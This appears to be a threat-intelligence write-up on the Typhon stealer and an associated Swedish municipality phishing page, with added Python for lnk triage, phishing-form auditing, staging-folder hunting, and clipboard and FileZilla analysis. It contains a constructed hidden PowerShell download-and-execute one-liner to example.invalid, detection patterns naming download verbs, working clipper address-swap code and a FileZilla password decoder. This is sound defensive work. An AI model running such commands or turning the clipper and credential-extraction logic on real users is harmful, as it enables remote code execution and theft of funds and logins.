New stealer developing Crypto Miner capabilities
During a routine threat hunting exercise, Cyble Research Labs (CRL) came across a Twitter post in which a researcher mentioned a URL hosting a Windows executable payload named systemupdate.exe. The researcher claims this executable is a variant of the Typhon stealer, delivered via a crafted .lnk file.
Upon analyzing the URL, we identified that it also hosts a phishing page impersonating Lindesbergs Kommun (a municipality in Örebro County, central Sweden). The page collects users’ sensitive information, such as name, Social Security Number (SSN), ORT (Swedish for town/locality), and credit/debit card details, and sends it to the Threat Actor’s (TA’s) server.
When a user opens the .lnk file, it runs a PowerShell command that downloads the Typhon stealer from the remote server and executes it. The image below shows the content of the .lnk file.
Cyble Research Labs also downloaded the Windows executable and performed a deep-dive analysis on it. We observed that this malicious program is based on Prynt Stealer and can steal data from multiple applications. The developer has also added a module for delivering the XMRig cryptominer; in this sample the module is not functional, either because it is still under development or because the TA who generated this build with the builder did not enable it.
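As an added example (not code from the original post or from the Typhon authors), the Python below parses the StringData section of a Shell Link file to recover the target and command-line arguments, then flags the download-and-execute shape described above: a script host as the target plus download or decode verbs in the arguments. The .lnk bytes are constructed inline by build_lnk() from a made-up PowerShell one-liner pointing at example.invalid; the real sample's command is not reproduced here.

```python
import re
import struct
import uuid

# MS-SHLLINK constants: the header CLSID and the LinkFlags bits the parser needs.
LNK_CLSID = uuid.UUID("00021401-0000-0000-c000-000000000046").bytes_le
HAS_ID_LIST, HAS_LINK_INFO, HAS_NAME, HAS_REL_PATH = 0x01, 0x02, 0x04, 0x08
HAS_WORK_DIR, HAS_ARGS, HAS_ICON, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
STRING_FIELDS = ((HAS_NAME, "name"), (HAS_REL_PATH, "relative_path"),
                 (HAS_WORK_DIR, "working_dir"), (HAS_ARGS, "arguments"),
                 (HAS_ICON, "icon_location"))


def parse_lnk(data):
    """Return the StringData fields of a .lnk, skipping LinkTargetIDList and LinkInfo."""
    if len(data) < 0x4C or data[:4] != b"\x4c\x00\x00\x00" or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    pos = 0x4C                                   # end of the fixed-size ShellLinkHeader
    if flags & HAS_ID_LIST:                      # IDListSize (u16) + ItemIDList bytes
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                    # LinkInfoSize (u32) counts itself
        pos += struct.unpack_from("<I", data, pos)[0]
    fields = {}
    for flag, key in STRING_FIELDS:              # StringData: CountCharacters + chars
        if not flags & flag:
            continue
        count = struct.unpack_from("<H", data, pos)[0]
        pos += 2
        if flags & IS_UNICODE:
            fields[key] = data[pos:pos + 2 * count].decode("utf-16-le", "replace")
            pos += 2 * count
        else:
            fields[key] = data[pos:pos + count].decode("latin-1")
            pos += count
    return fields


# Triage heuristics: script host as target plus download/decode verbs in the arguments.
LOLBIN_RE = re.compile(r"\b(powershell|pwsh|cmd|mshta|wscript|cscript|rundll32|certutil)(\.exe)?\b", re.I)
DOWNLOAD_RE = re.compile(r"(downloadstring|downloadfile|invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b|"
                         r"\biex\b|invoke-expression|-enc\b|-e\b|frombase64string|https?://)", re.I)


def triage_lnk(data):
    fields = parse_lnk(data)
    target = " ".join(fields.get(k, "") for k in ("relative_path", "working_dir", "arguments"))
    lolbin = bool(LOLBIN_RE.search(target))
    downloader = bool(DOWNLOAD_RE.search(fields.get("arguments", "")))
    return {"fields": fields, "lolbin": lolbin, "downloader": downloader,
            "suspicious": lolbin and downloader}


def build_lnk(rel_path, args, id_list=b"", name="", work_dir="", icon=""):
    """Constructed test data: a minimal Unicode .lnk with no LinkInfo block."""
    flags = IS_UNICODE | (HAS_ID_LIST if id_list else 0)
    strings = []
    for flag, value in ((HAS_NAME, name), (HAS_REL_PATH, rel_path),
                        (HAS_WORK_DIR, work_dir), (HAS_ARGS, args), (HAS_ICON, icon)):
        if value:
            flags |= flag
            strings.append(value)
    header = struct.pack("<I16sIIQQQIIIH", 0x4C, LNK_CLSID, flags, 0x20, 0, 0, 0, 0, 0, 1, 0)
    header += b"\x00" * 10                       # Reserved1/2/3
    body = (struct.pack("<H", len(id_list)) + id_list) if id_list else b""
    body += b"".join(struct.pack("<H", len(s)) + s.encode("utf-16-le") for s in strings)
    return header + body


# Constructed sample: a made-up one-liner; example.invalid is not a real host.
SAMPLE_TARGET = "..\\..\\..\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
SAMPLE_ARGS = ("-w hidden -nop -c \"$p=$env:TEMP+'\\systemupdate.exe';"
               "(New-Object Net.WebClient).DownloadFile('http://example.invalid/systemupdate.exe',$p);"
               "Start-Process $p\"")
# One 20-byte ItemID plus the 2-byte TerminalID, so the IDList skip is exercised too.
SAMPLE_LNK = build_lnk(SAMPLE_TARGET, SAMPLE_ARGS, id_list=b"\x14\x00" + b"\x1f" * 18 + b"\x00\x00")

if __name__ == "__main__":
    print(triage_lnk(SAMPLE_LNK))
```

Real samples often carry the target only in the LinkTargetIDList (no RelativePath), so for triage at scale the IDList should be decoded as well; this example reads StringData only, which is where the PowerShell arguments of a download-and-execute shortcut live.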
The TA has also created a Telegram channel to communicate with people who want to purchase Typhon stealer services. The images below show that the stealer is updated through this Telegram channel, where the TA is actively releasing updates. The TA sells the stealer under a lifetime subscription model for $50.
Interestingly, the TA also provides spreading and crypting services to those who purchase the stealer, as shown below.
Phishing Page Analysis
When the user visits the URL hxxp://lindesbergparkeringsanmarkning[.]netlify[.], it opens a fake payment form carrying the Lindesbergs kommun name and logo, which asks the user to pay 300 SEK (Swedish krona, the national currency of Sweden).
The payment form also asks for users’ sensitive information such as name, Social Security Number (SSN), ORT, and Credit/Debit card details.
When users enter their details in the form, the page submits everything they typed to the TA via Formspree, using the URL hxxps://formspree[.]io/f/xknylake.
Formspree is a legitimate form backend, API, and email service for HTML forms: it delivers form submissions by email without any server-side code. It is free or very low cost, so the phishing page needs no server of its own to collect victim data.
After the data is submitted, the website redirects the user to Formspree’s acknowledgment page, which confirms the submission.
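As an added example, not part of the Cyble write-up, the Python below shows how a defender can spot this pattern in a captured page: it parses every form, resolves the action URL against the page URL, and flags forms that send sensitive fields (SSN or personnummer, card number, expiry, CVV) to a host other than the page itself, particularly a known hosted form backend such as Formspree. The HTML and the lookalike page host (lindesbergs-lookalike.example) are constructed for the example; the Formspree endpoint is the one from the analysis, and the backend list is an illustrative starting point.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

# Hosted form backends that phishing kits use instead of running their own server.
# Illustrative list for this example; extend it from your own telemetry.
FORM_BACKENDS = {"formspree.io", "getform.io", "formsubmit.co", "usebasin.com"}
SENSITIVE_FIELD = re.compile(r"(ssn|personnummer|social|card|cvv|cvc|expir|pass|\bpin\b|iban)", re.I)


class FormCollector(HTMLParser):
    """Collect every <form> with its action, method and the input fields it carries."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            self._current = {"action": a.get("action", ""),
                             "method": (a.get("method") or "get").lower(),
                             "fields": []}
            self.forms.append(self._current)
        elif tag in ("input", "select", "textarea") and self._current is not None:
            self._current["fields"].append((a.get("name") or a.get("id") or "",
                                            (a.get("type") or "text").lower()))

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def audit_forms(html, page_url):
    """One finding per form: where it posts and which sensitive fields leave the page."""
    page_host = (urlparse(page_url).hostname or "").lower()
    collector = FormCollector()
    collector.feed(html)
    findings = []
    for form in collector.forms:
        action = urlparse(urljoin(page_url, form["action"]))
        host = (action.hostname or page_host).lower()
        backend = any(host == b or host.endswith("." + b) for b in FORM_BACKENDS)
        sensitive = [n for n, t in form["fields"] if t == "password" or SENSITIVE_FIELD.search(n)]
        offsite = host != page_host
        findings.append({"action": action.geturl(), "host": host, "method": form["method"],
                         "third_party": offsite, "form_backend": backend,
                         "sensitive": sensitive,
                         "risk": "high" if (offsite and sensitive) else "low"})
    return findings


# Constructed sample page: a payment form posting to Formspree, plus a harmless
# same-origin search form that must not be flagged.
SAMPLE_PAGE_URL = "http://lindesbergs-lookalike.example/"
SAMPLE_HTML = """
<form action="https://formspree.io/f/xknylake" method="POST">
  <input name="namn" type="text">
  <input name="personnummer" type="text">
  <input name="ort" type="text">
  <input name="cardnumber" type="text">
  <input name="expiry" type="text">
  <input name="cvv" type="password">
  <input type="submit" value="Betala 300 SEK">
</form>
<form action="/sok" method="get"><input name="q" type="search"></form>
"""

if __name__ == "__main__":
    for finding in audit_forms(SAMPLE_HTML, SAMPLE_PAGE_URL):
        print(finding)
```

The same check can be run on proxy captures or on pages fetched by a URL-detonation pipeline; a form that posts card data to a form-backend service is a stronger signal than the lookalike domain alone, because it is independent of the brand being imitated.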
(Sample SHA256: 67afd1f116ffcf84c59bef3d3b925dc82dadebc21f2e8cc39b77892104b9e9ec)
The malware first performs various anti-analysis checks, if the TA enabled the anti-analysis option when building it. Each check returns a boolean flag set to True if it detects an antivirus product or a sandbox environment, in which case the stealer terminates with a fake error message.
The malware uses GetModuleHandle() to check whether the following DLLs, associated with sandbox and antivirus products, are loaded in its own process:

| DLL | Associated product |
|---|---|
| SxIn.dll | 360 Total Security |

The stealer also checks whether the following analysis-related applications are running and exits if any are found:
The stealer calls CheckRemoteDebuggerPresent() to determine whether its process is being debugged, and uses Windows Management Instrumentation (WMI) queries to detect a virtual environment, as shown below.
The stealer also checks for a mutex named “GOJJL2LPIZM04XC0NQ4I” to ensure that only one instance runs on the victim’s machine; it terminates if the mutex already exists.
The stealer can also spread via mounted drives, copying itself to each mounted drive as “USB-Service”.
The stealer can also copy itself into the Startup folder to establish persistence, so that it runs automatically at every user login.
The stealer creates a hidden folder under Local AppData to store the stolen data. The folder is named with the MD5 hash of a concatenated string consisting of the username, computer name, culture, processor name, and video controller name.
Under it, it creates a second folder named “Username@ComputerName_Culture”.
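The naming scheme gives responders something concrete to hunt for. The following Python is added here (it is not the sample’s code): it reproduces the two folder names from host attributes and then sweeps a Local AppData tree for the pair, a 32-hex-character directory containing a user@host_culture subdirectory. The exact concatenation order and separator the stealer uses are not visible in the post, so expected_staging_dir() assumes the five values are joined without a separator in the order listed; the directory tree used by self_test() is constructed in a temporary folder.

```python
import hashlib
import os
import re
import tempfile

HEX32 = re.compile(r"^[0-9a-f]{32}$", re.I)
# "<user>@<host>_<culture>", culture in .NET form such as en-US or sv-SE.
INNER = re.compile(r"^[^@\\/]+@[^@\\/]+_[a-z]{2,3}(-[A-Za-z]{2,4})?$")


def expected_staging_dir(username, computer, culture, cpu, gpu):
    """MD5 of the concatenated host attributes. ASSUMPTION: joined with no separator."""
    raw = "".join((username, computer, culture, cpu, gpu))
    return hashlib.md5(raw.encode("utf-8")).hexdigest()


def expected_inner_dir(username, computer, culture):
    return f"{username}@{computer}_{culture}"


def hunt_staging_dirs(local_appdata):
    """Return (outer, inner) paths that match the stealer's naming scheme."""
    hits = []
    try:
        outer_entries = os.scandir(local_appdata)
    except FileNotFoundError:
        return hits
    with outer_entries:
        for outer in outer_entries:
            if not outer.is_dir() or not HEX32.match(outer.name):
                continue
            with os.scandir(outer.path) as inner_entries:
                for inner in inner_entries:
                    if inner.is_dir() and INNER.match(inner.name):
                        hits.append((outer.path, inner.path))
    return hits


def build_sample_tree(root):
    """Constructed fixture: one staging dir plus two decoys that must not match."""
    user, host, culture = "alice", "DESKTOP-TEST", "sv-SE"
    outer = expected_staging_dir(user, host, culture, "Intel Core i7", "NVIDIA GeForce")
    os.makedirs(os.path.join(root, outer, expected_inner_dir(user, host, culture)))
    os.makedirs(os.path.join(root, "a" * 32, "Cache"))                          # hex name, wrong inner
    os.makedirs(os.path.join(root, "Microsoft", "alice@DESKTOP-TEST_sv-SE"))    # right inner, wrong outer
    return os.path.join(root, outer)


def self_test():
    """Build the fixture in a temp dir, run the hunt, return (hits, expected outer path)."""
    with tempfile.TemporaryDirectory() as root:
        expected_outer = build_sample_tree(root)
        hits = hunt_staging_dirs(root)
    return hits, expected_outer


if __name__ == "__main__":
    print(self_test())
```

On a live host the hidden attribute on the outer folder is an extra discriminator (check it with attrib or Get-Item in PowerShell); the name match alone is deliberately loose so that a changed hash input in a later build still triggers on the user@host_culture inner folder.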
A clipper lets the TA steal cryptocurrency by replacing a wallet address in the victim’s clipboard with the TA’s own address. Typhon Stealer clips addresses for the following cryptocurrencies:
- Ethereum (ETH)
- Bitcoin (BTC)
- XRP (XRP)
- Stellar (XLM)
- Monero (XMR)
- Bitcoin Cash (BCH)
- Litecoin (LTC)
The figure below shows the Base64-encoded regular expressions used to recognize each type of address in the clipboard.
The stealer also performs keylogging in a separate thread, saving the captured keystrokes under the “logs\\keylogger\\” folder. The figure below shows the keylogger functionality in the stealer.
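As an added example, not the malware’s own code, the Python below mirrors the clipper logic so the address formats can be tested: the regular expressions are kept Base64-encoded, decoded at start-up, and then used both to classify clipboard text and to show what the swap looks like, with a defender-side check on clipboard history alongside. The patterns are this example’s approximations of each coin’s address format (standard Monero addresses only; bech32 and legacy forms for Bitcoin and Litecoin), not the strings from the sample. The attacker wallet and the test addresses are constructed, except for the well-known Bitcoin genesis address.

```python
import base64
import re

# Approximate address formats. Stored Base64-encoded to mirror how the sample
# hides its regexes; decode_patterns() is the equivalent of the stealer's start-up.
_PLAIN = {
    "ETH": r"^0x[0-9a-fA-F]{40}$",
    "XMR": r"^4[0-9AB][1-9A-HJ-NP-Za-km-z]{93}$",            # standard addresses only
    "XLM": r"^G[A-Z2-7]{55}$",
    "XRP": r"^r[1-9A-HJ-NP-Za-km-z]{24,34}$",
    "BCH": r"^(bitcoincash:)?[qp][a-z0-9]{41}$",
    "BTC": r"^(bc1[a-z0-9]{25,87}|[13][1-9A-HJ-NP-Za-km-z]{25,34})$",
    "LTC": r"^(ltc1[a-z0-9]{25,87}|[LM][1-9A-HJ-NP-Za-km-z]{26,33})$",
}
ENCODED_PATTERNS = {coin: base64.b64encode(rx.encode()).decode() for coin, rx in _PLAIN.items()}


def decode_patterns(encoded):
    """Decode the Base64 table into compiled regexes, as the stealer does at run time."""
    return {coin: re.compile(base64.b64decode(b64).decode()) for coin, b64 in encoded.items()}


PATTERNS = decode_patterns(ENCODED_PATTERNS)


def classify_address(text):
    """Return the coin whose address format matches the text, else None.
    Order matters: a legacy 3-prefixed Litecoin P2SH address is syntactically
    identical to a Bitcoin one, so it is reported as BTC here."""
    text = text.strip()
    for coin, rx in PATTERNS.items():
        if rx.match(text):
            return coin
    return None


def clip(clipboard_text, attacker_wallets):
    """The clipper's action: swap a recognised address for the TA's wallet of that coin."""
    coin = classify_address(clipboard_text)
    if coin and coin in attacker_wallets:
        return attacker_wallets[coin], coin
    return clipboard_text, None


def detect_swap(before, after):
    """Defender-side check on clipboard history: same coin, different address."""
    cb, ca = classify_address(before), classify_address(after)
    return cb is not None and cb == ca and before.strip() != after.strip()


# Constructed attacker wallets (syntactically valid only) for the demonstration.
ATTACKER_WALLETS = {"BTC": "1" + "2" * 33, "ETH": "0x" + "f" * 40}
BTC_GENESIS = "1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa"   # real, well-known address

if __name__ == "__main__":
    print(clip(BTC_GENESIS, ATTACKER_WALLETS))
```

detect_swap() is the piece worth keeping: an endpoint agent that records clipboard writes can raise an alert whenever two consecutive entries are valid addresses of the same coin but differ, which is exactly the clipper’s footprint and does not depend on knowing the TA’s wallet.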
This Typhon sample targets three browsers:
- Chromium-based browsers
- Microsoft Edge
- Firefox-based browsers
Typhon stealer targets over 30 Chromium-based browsers, more than five Mozilla-based browsers, and Microsoft Edge. These browsers keep profile files under the user’s AppData directory (Local for Chromium-based browsers and Edge, Roaming for Firefox-based ones) that hold sensitive data such as login credentials, cookies, and autofill entries, and the stealer reads these files to extract that data. The figure below shows the browser directories targeted by the stealer.
Typhon stealer targets two FTP applications:
FileZilla is a free, open-source, cross-platform FTP client. The stealer reads “sitemanager.xml” and “recentservers.xml” and writes the extracted data to a “Hosts.txt” file under the “FileZilla” folder for exfiltration.
WinSCP is a popular SFTP and FTP client for Windows that stores saved session data in the registry. Typhon stealer grabs the WinSCP data from the “Software\\Martin Prikryl\\WinSCP 2\\Sessions” registry key.
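Added example (not the stealer’s code): a Python parser for FileZilla’s sitemanager.xml and recentservers.xml that shows exactly what the stealer gets from these files. Without a master password FileZilla stores the password Base64-encoded, which is plaintext for any process running as the user; with a master password set, the Pass element carries encoding="crypt" and the stealer only obtains ciphertext. The XML document is constructed inline and the hosts are example.invalid names.

```python
import base64
import xml.etree.ElementTree as ET


def parse_filezilla_servers(xml_text):
    """Extract saved servers from sitemanager.xml or recentservers.xml (same <Server> layout)."""
    root = ET.fromstring(xml_text)
    servers = []
    for srv in root.iter("Server"):
        pass_el = srv.find("Pass")
        encoding = pass_el.get("encoding", "") if pass_el is not None else ""
        if pass_el is None or not (pass_el.text or "").strip():
            password, protected = None, False
        elif encoding == "base64":             # no master password: reversible on sight
            password = base64.b64decode(pass_el.text.strip()).decode("utf-8", "replace")
            protected = False
        elif encoding == "crypt":              # master password set: ciphertext only
            password, protected = None, True
        else:                                  # no encoding attribute: stored verbatim
            password, protected = pass_el.text, False
        servers.append({
            "name": (srv.findtext("Name") or "").strip(),
            "host": (srv.findtext("Host") or "").strip(),
            "port": int(srv.findtext("Port") or 0),
            "user": (srv.findtext("User") or "").strip(),
            "password": password,
            "password_protected": protected,
        })
    return servers


# Constructed sample in the FileZilla 3 layout: one plaintext-equivalent entry and
# one protected by a master password (the pubkey value is a placeholder).
SAMPLE_SITEMANAGER = f"""<?xml version="1.0" encoding="UTF-8"?>
<FileZilla3 version="3.55.1" platform="windows">
  <Servers>
    <Server>
      <Host>ftp.example.invalid</Host>
      <Port>21</Port>
      <Protocol>0</Protocol>
      <User>backup</User>
      <Pass encoding="base64">{base64.b64encode(b'SuperSecret1').decode()}</Pass>
      <Logontype>1</Logontype>
      <Name>Prod backup</Name>
    </Server>
    <Server>
      <Host>sftp.example.invalid</Host>
      <Port>22</Port>
      <Protocol>1</Protocol>
      <User>deploy</User>
      <Pass encoding="crypt" pubkey="PLACEHOLDER">QUJDREVGR0g=</Pass>
      <Logontype>1</Logontype>
      <Name>Deploy box</Name>
    </Server>
  </Servers>
</FileZilla3>"""

if __name__ == "__main__":
    for entry in parse_filezilla_servers(SAMPLE_SITEMANAGER):
        print(entry)
```

The practical takeaway is the password_protected flag: enabling FileZilla’s master password turns the file the stealer copies into ciphertext, and on a compromised host the entries that come back with a plaintext password are the credentials that must be rotated first.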
Typhon Stealer targets the following gaming applications and steals sensitive data from the victim’s machine.
The malware locates the Steam installation path from the registry value under HKEY_LOCAL_MACHINE\Software\Valve\Steam, then enumerates the subkeys under HKEY_LOCAL_MACHINE\Software\Valve\Steam\Apps to get details of the installed applications, as shown in the figure below. It also copies Steam’s SSFN file, known as the authorization file, for exfiltration.
The malware looks for the “Ubisoft Game Launcher” folder under AppData; if the folder is present, it copies all of its files for exfiltration.
For Minecraft, the stealer checks whether the “.minecraft” folder exists under the AppData directory. If it does, it creates a folder named “Minecraft” under the “Gaming” folder to hold the stolen data.
The stealer copies “launcher_profiles.json,” “servers.dat,” and screenshots into the “Minecraft” folder for exfiltration. It also extracts mod and version details and saves them in text files created in the same folder.
The Typhon stealer targets the following messaging applications:
The malware first creates a folder named “Messenger” to hold the data from these applications. To steal Discord tokens, it first searches the following directories:
- Discord\\Local Storage\\leveldb
- discordptb\\Local Storage\\leveldb
- Discord Canary\\leveldb
The malware steals Telegram sessions by copying files from the “Telegram Desktop\tdata” folder. For Pidgin, it checks whether “.purple\\accounts.xml” exists under the AppData folder; if so, it extracts the login credentials and protocol details and saves them in a “Pidgin Accounts.txt” file, as shown below.
This stealer steals credentials from three VPNs: ProtonVPN, OpenVPN, and NordVPN.
The malware first checks whether a VPN client is installed by looking for the directory C:\Users\[username]\AppData\Local\[VPN name], as shown in the figure below.
If a targeted VPN client is installed on the victim’s system, the stealer extracts credentials from its configuration files (user.config, etc.) and copies the configuration file into the folder used for the stolen data.
Typhon Stealer also targets crypto wallets, as shown in the figure below. The stealer creates a folder named “Wallets,” then iterates over a list of Base64-encoded wallet paths to check whether each wallet is present on the victim’s system.
It also targets the Bitcoin, Dash, and Litecoin Qt wallet clients by reading their data path from the registry key HKEY_CURRENT_USER\Software\<Blockchain_name>\<Blockchain_name>-Qt.
The stealer grabs files from the Desktop, My Pictures, Personal (Documents), Downloads, OneDrive, and Dropbox directories. It only grabs files smaller than 5 MB that have one of the extensions listed below.
| Category | Extensions |
|---|---|
| Document | pdf, rtf, doc, docx, xls, xlsx, ppt, pptx, indd, txt, json |
| Database | db, db3, db4, kdb, kdbx, sql, sqlite, mdf, mdb, dsk, dbf, wallet, ini |
| Source code | c, cs, cpp, asm, sh, py, pyw, html, css, php, go, js, rb, pl, swift, java, kt, kts, ino |
| Image | jpg, jpeg, png, bmp, psd, svg, ai |
It also steals system information such as hardware details, OS details, and Windows product keys. The figure below shows sample system information collected by the stealer. The stealer can also capture pictures from the victim’s webcam.
Along with exfiltrating data to the Telegram channel, the stealer can upload the stolen data to AnonFiles, a file hosting service that lets users upload files anonymously. The figure below shows the AnonFiles upload functionality.
The stealer also contains code for delivering XMRig, a cryptominer. This feature is not functional in this sample, but we suspect that TAs may use Typhon Stealer to deliver cryptominers in the future.
Threat Actors continuously refine their techniques to target users across sectors, including government organizations and industries from various domains. In this case, they use a Lindesbergs Kommun theme to lure users and deploy the Typhon stealer payload.
In the past, Cyble has observed numerous data breaches in prominent organizations through such malicious programs. Organizations or individuals are advised to follow industry-standard cybersecurity practices to secure themselves and their firms.
We have listed some essential cybersecurity best practices that create the first line of control against attackers. We recommend that our readers follow the best practices given below:
How to prevent malware infection?
- Avoid downloading pirated software from warez/torrent websites. The “hack tools” offered on sites such as YouTube and torrent sites frequently carry this kind of malware.
- Use strong passwords and enforce multi-factor authentication wherever possible.
- Turn on the automatic software update feature on your computer, mobile, and other connected devices.
- Use a reputed antivirus and internet security software package on your connected devices, including PC, laptop, and mobile.
- Refrain from opening untrusted links and email attachments without first verifying their authenticity.
- Educate employees on protecting themselves from threats such as phishing and untrusted URLs.
- Block URLs that could be used to spread the malware, e.g., Torrent/Warez.
- Monitor beacons at the network level to block data exfiltration by malware or TAs.
- Enable Data Loss Prevention (DLP) Solution on the employees’ systems.
MITRE ATT&CK® Techniques
| Tactic | Technique ID | Technique Name |
|---|---|---|
| Defense Evasion | T1497.001 | Virtualization/Sandbox Evasion: System Checks |
| Credential Access | T1555 | Credentials from Password Stores |
| Credential Access | T1539 | Steal Web Session Cookie |
| Credential Access | T1528 | Steal Application Access Token |
| Discovery | T1087 | Account Discovery |
| Discovery | T1124 | System Time Discovery |
| Discovery | T1007 | System Service Discovery |
| Discovery | T1614 | System Location Discovery |
| Command and Control | T1095 | Non-Application Layer Protocol |
| Exfiltration | T1041 | Exfiltration Over C2 Channel |
| Exfiltration | T1567 | Exfiltration Over Web Service |
Indicators of Compromise (IOCs)
| Indicator | Type | Description |
|---|---|---|
| hxxp://lindesbergparkeringsanmarkning[.]netlify[.]app | URL | URL hosting the phishing page and the Typhon Stealer payload |
| hxxps://formspree[.]io/f/xknylake | URL | Formspree endpoint receiving the phishing form submissions |
| 67afd1f116ffcf84c59bef3d3b925dc82dadebc21f2e8cc39b77892104b9e9ec | SHA256 | Typhon Stealer sample (systemupdate.exe) |